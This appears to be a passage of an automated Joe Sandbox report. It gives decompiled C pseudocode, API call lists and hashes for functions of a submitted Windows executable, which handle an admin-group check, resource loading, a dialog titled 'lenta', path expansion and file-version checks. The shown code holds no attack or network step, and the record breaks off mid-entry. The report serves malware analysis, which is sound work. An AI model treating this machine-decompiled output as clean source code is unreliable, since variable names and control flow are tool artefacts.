Part of subcall function 00EB17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00EB18DD), ref: 00EB188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00EB18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00EB18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00EB190A
GetLastError.KERNEL32 ref: 00EB1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00EB192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00EB1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB1964
EqualSid.ADVAPI32(00000004,?), ref: 00EB197A
FreeSid.ADVAPI32(?), ref: 00EB199C
LocalFree.KERNEL32(00000000), ref: 00EB19A3
CloseHandle.KERNEL32(?), ref: 00EB19AD

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 96f8d1d3c5216c58564412aca5ea31f057d7eb6ee0851c9a4156fc5ecfc7adbf
Instruction ID: fb3bf06aa4345d243a4707a689f7b66a989cf89193803343bee15e2a71ea5f3f
Opcode Fuzzy Hash: 96f8d1d3c5216c58564412aca5ea31f057d7eb6ee0851c9a4156fc5ecfc7adbf
Instruction Fuzzy Hash: 1A314C71A00209AFDF20AFA6DC68AEFBBBCFF48354F541569E545F2150DB309909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EB468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00EB468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00eb4699
0x00eb469b
0x00eb46a9
0x00eb46af
0x00eb46b4
0x00eb46bc
0x00eb46f9
0x00000000
0x00eb46f9
0x00eb46d9
0x00eb46dd
0x00000000
0x00000000
0x00eb46e5
0x00eb46ef
0x00000000
0x00eb46f5
0x00eb46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
memcpy_s.MSVCRT ref: 00EB46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

Strings

lenta, xrefs: 00EB46E4
TITLE, xrefs: 00EB469D, 00EB46C0

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lenta
API String ID: 3370778649-2035842925
Opcode ID: 02bfd4c331e3fbe73e2d93bf1fb8a9444879f87ec53efde4061f10404e7a2cec
Instruction ID: 4bf7b935562e52e03b4d654017a7fa676784a89b19f7997a6978e84e0c1072ef
Opcode Fuzzy Hash: 02bfd4c331e3fbe73e2d93bf1fb8a9444879f87ec53efde4061f10404e7a2cec
Instruction Fuzzy Hash: 750186776442107FE71027A6AC4DFAB7E2CDBC6B51F080134FA89B6191C9718C4586A6

Uniqueness

Uniqueness Score: -1.00%

Function 00EB681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EB681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xeb8004; // 0x92ae1240
				_v8 = _t19 ^ _t44;
				_t41 =  *0xeb81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xeb81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xeb81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xeb1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00EB66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xeb81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0xeb463b
				return E00EB6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x00eb681f
0x00eb682a
0x00eb6831
0x00eb6836
0x00eb683c
0x00eb683e
0x00eb6848
0x00eb6851
0x00eb685d
0x00eb6864
0x00eb6876
0x00eb693a
0x00eb693a
0x00eb687c
0x00eb687e
0x00eb6885
0x00000000
0x00eb68d6
0x00eb68f4
0x00eb6900
0x00eb6902
0x00eb690a
0x00000000
0x00eb690c
0x00eb690c
0x00eb691c
0x00000000
0x00eb691e
0x00eb6924
0x00eb692b
0x00eb6932
0x00000000
0x00000000
0x00000000
0x00eb692b
0x00eb691c
0x00eb690a
0x00eb6885
0x00eb6876
0x00eb6940
0x00eb6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00EB686E
GetSystemMetrics.USER32(0000004A), ref: 00EB68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00EB68CC
RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,?,0000000C), ref: 00EB68F4
RegCloseKey.ADVAPI32(?), ref: 00EB6902

Part of subcall function 00EB66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00EB691A), ref: 00EB6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00EB68C2
;F, xrefs: 00EB6940

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-574545411
Opcode ID: bf21fd290622801881b9db1e7e964f2617e4016286ee49941be4ec5ee2f46170
Instruction ID: c7be66426ed662acfdd15bf13fec6422c48a078bc18cdc7ddcd114b13cabc29b
Opcode Fuzzy Hash: bf21fd290622801881b9db1e7e964f2617e4016286ee49941be4ec5ee2f46170
Instruction Fuzzy Hash: DA318431A013189FDF31CB1ADD04BEBB7B9EB85768F0401A5E949B2150DB349D89CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00EB43D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0xeb9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xeb91dc = 1;
					goto L8;
				}
				return 0;
			}

0x00eb3459
0x00eb345c
0x00eb34d8
0x00eb34de
0x00000000
0x00eb34e0
0x00eb345e
0x00eb3463
0x00eb349a
0x00eb34a0
0x00eb34a7
0x00eb34b2
0x00eb34c4
0x00eb34cb
0x00000000
0x00eb34cb
0x00eb3468
0x00eb346e
0x00eb3474
0x00000000
0x00000000
0x00eb347c
0x00eb348c
0x00eb3490
0x00000000
0x00eb3496
0x00eb3484
0x00000000
0x00000000
0x00eb3486
0x00000000
0x00eb3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00EB3490
GetDesktopWindow.USER32 ref: 00EB349A
SetWindowTextA.USER32(?,lenta), ref: 00EB34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00EB34C4
SetForegroundWindow.USER32(?), ref: 00EB34CB
EndDialog.USER32(?,00000002), ref: 00EB34D8

Strings

lenta, xrefs: 00EB34AC

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lenta
API String ID: 852535152-2780258678
Opcode ID: 0acf5d59dddcebeb8f075ed2a26410298cd804057b7e8cf0a5196d26022e7199
Instruction ID: 9e06851cf4187526d6988e09ae360f7df9a1b3323d9c3c0ef479247eac1d3442
Opcode Fuzzy Hash: 0acf5d59dddcebeb8f075ed2a26410298cd804057b7e8cf0a5196d26022e7199
Instruction Fuzzy Hash: B6012431241124AFCB1A1F7EED0E8EF3B64EB05701F045120FA62B69A0CB308F41DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00EB2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xeb8004; // 0x92ae1240
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xeb9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00EB1680(_t65, E00EB17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00EB65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00EB1680(_t65, E00EB17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00EB6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00eb2aac
0x00eb2ab7
0x00eb2abc
0x00eb2abe
0x00eb2ac3
0x00eb2ac6
0x00eb2ac9
0x00eb2ace
0x00eb2ae6
0x00eb2bdc
0x00eb2bdc
0x00eb2be0
0x00000000
0x00000000
0x00eb2af2
0x00eb2afc
0x00eb2b00
0x00eb2b05
0x00eb2b05
0x00eb2b0b
0x00eb2bca
0x00eb2bd1
0x00eb2b11
0x00eb2b18
0x00eb2b26
0x00eb2b99
0x00eb2bc8
0x00000000
0x00000000
0x00eb2b9b
0x00eb2bae
0x00eb2bb3
0x00eb2bb5
0x00eb2bb5
0x00eb2bb8
0x00eb2bb8
0x00eb2bba
0x00eb2bbb
0x00000000
0x00eb2bb8
0x00eb2b28
0x00eb2b2e
0x00eb2b33
0x00eb2b39
0x00eb2b3c
0x00eb2b3c
0x00eb2b3e
0x00eb2b3f
0x00eb2b55
0x00eb2b5d
0x00eb2b64
0x00eb2b64
0x00eb2b7a
0x00eb2b7f
0x00eb2b81
0x00eb2b81
0x00eb2b84
0x00eb2b84
0x00eb2b86
0x00eb2b87
0x00eb2bbf
0x00eb2bc1
0x00eb2bc1
0x00eb2b26
0x00eb2bda
0x00eb2bda
0x00eb2be6
0x00eb2be6
0x00eb2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00EB2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00EB2AF2
CharNextA.USER32(?), ref: 00EB2B12
CharUpperA.USER32 ref: 00EB2B1E
CharPrevA.USER32(?,?), ref: 00EB2B55
CharNextA.USER32(?), ref: 00EB2BD4

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 51e56095bce3329132e46e051482621dd5b319fd2b1116181b3bb17dc9089dec
Instruction ID: d33f4f9e491f1b7e368078bfca6697735c2699ddc68b7c3c41a85cb525dfe3cc
Opcode Fuzzy Hash: 51e56095bce3329132e46e051482621dd5b319fd2b1116181b3bb17dc9089dec
Instruction Fuzzy Hash: 2C4112345042455EDF169F249C94AFF7BA99F52314F1801EEE8C2B7202DF254E8A8B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EB28E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00EB2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0xeb3938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0xeb3938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00EB2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00EB2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00eb28f1
0x00eb28f4
0x00eb28f7
0x00eb28f9
0x00eb28fc
0x00eb28ff
0x00eb2901
0x00eb2907
0x00eb2a62
0x00eb2a64
0x00eb290d
0x00eb290d
0x00eb290f
0x00eb2912
0x00eb2920
0x00eb2937
0x00000000
0x00000000
0x00eb293d
0x00eb2944
0x00eb294a
0x00eb294f
0x00eb2a2f
0x00eb2a32
0x00eb2a34
0x00eb2a37
0x00eb2a41
0x00000000
0x00000000
0x00eb2955
0x00eb295e
0x00eb2962
0x00eb2969
0x00eb296f
0x00eb2974
0x00eb297e
0x00eb298c
0x00eb2a20
0x00eb2a21
0x00eb2a27
0x00eb2a4c
0x00eb2a4f
0x00eb2a50
0x00eb2a53
0x00eb2a56
0x00eb2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb29b2
0x00eb29b2
0x00eb29b5
0x00eb29bd
0x00eb29c3
0x00eb29cc
0x00eb29d5
0x00eb29d7
0x00eb29da
0x00eb29dd
0x00eb29df
0x00eb29ec
0x00eb29f8
0x00eb29fc
0x00eb29ff
0x00eb2a02
0x00eb2a07
0x00eb2a0a
0x00eb2a0f
0x00eb2a19
0x00eb2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb2a0f
0x00eb298c
0x00eb2974
0x00eb2962
0x00000000
0x00eb294f
0x00eb2912
0x00eb2a65
0x00eb2a68
0x00eb2a6c
0x00eb2a6f
0x00eb2a6f
0x00eb2a7d

APIs

GlobalFree.KERNEL32 ref: 00EB2A6F

Part of subcall function 00EB2773: CharUpperA.USER32(92AE1240,00000000,00000000,00000000), ref: 00EB27A8
Part of subcall function 00EB2773: CharNextA.USER32(0000054D), ref: 00EB27B5
Part of subcall function 00EB2773: CharNextA.USER32(00000000), ref: 00EB27BC
Part of subcall function 00EB2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2829
Part of subcall function 00EB2773: RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2852
Part of subcall function 00EB2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2870
Part of subcall function 00EB2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00EB3938,?,?,?,?,-00000005), ref: 00EB2958
GlobalLock.KERNEL32 ref: 00EB2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00EB3938,?,?,?,?,-00000005,?), ref: 00EB2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00EB3938,?,?), ref: 00EB2A81

Strings

89, xrefs: 00EB293D, 00EB297E, 00EB2940

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89
API String ID: 3949799724-2925746602
Opcode ID: 1eaa3809b0a083081c163f7d0a0e5ab5aed20df14654dabd25aefd32d9d3da78
Instruction ID: 21f0b91f8ca06eebef5a7ac28f177e84fe24afb8c0350d6cae6781789f268339
Opcode Fuzzy Hash: 1eaa3809b0a083081c163f7d0a0e5ab5aed20df14654dabd25aefd32d9d3da78
Instruction Fuzzy Hash: 57510631A00219EFCF22DF99D884AEEBBB5FF48704F14516AEA15F3221DB319941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EB43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00EB43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xeb8004; // 0x92ae1240
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00EB6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00eb43d0
0x00eb43d8
0x00eb43df
0x00eb43e6
0x00eb43ec
0x00eb43f1
0x00eb4400
0x00eb4403
0x00eb440b
0x00eb4420
0x00eb4429
0x00eb4437
0x00eb4444
0x00eb4447
0x00eb444d
0x00eb4454
0x00eb445b
0x00eb4460
0x00eb4461
0x00eb4467
0x00eb446f
0x00eb4473
0x00eb4473
0x00eb4463
0x00eb4463
0x00eb4463
0x00eb447a
0x00eb4481
0x00eb4484
0x00eb448a
0x00eb4492
0x00eb4496
0x00eb4496
0x00eb4486
0x00eb4486
0x00eb4486
0x00eb44b8

APIs

GetWindowRect.USER32(?,?), ref: 00EB43F1
GetWindowRect.USER32(00000000,?), ref: 00EB440B
GetDC.USER32(?), ref: 00EB4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00EB442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00EB443A
ReleaseDC.USER32(?,00000000), ref: 00EB4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00EB44A2

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: a98b1705347363888af400a425714f6f87186fe8cbb0cc67adae2b38774ed225
Instruction ID: 8edc153af458735b5a6a9da45c51db31072c172c820ee002a1bf2c59b129c4a5
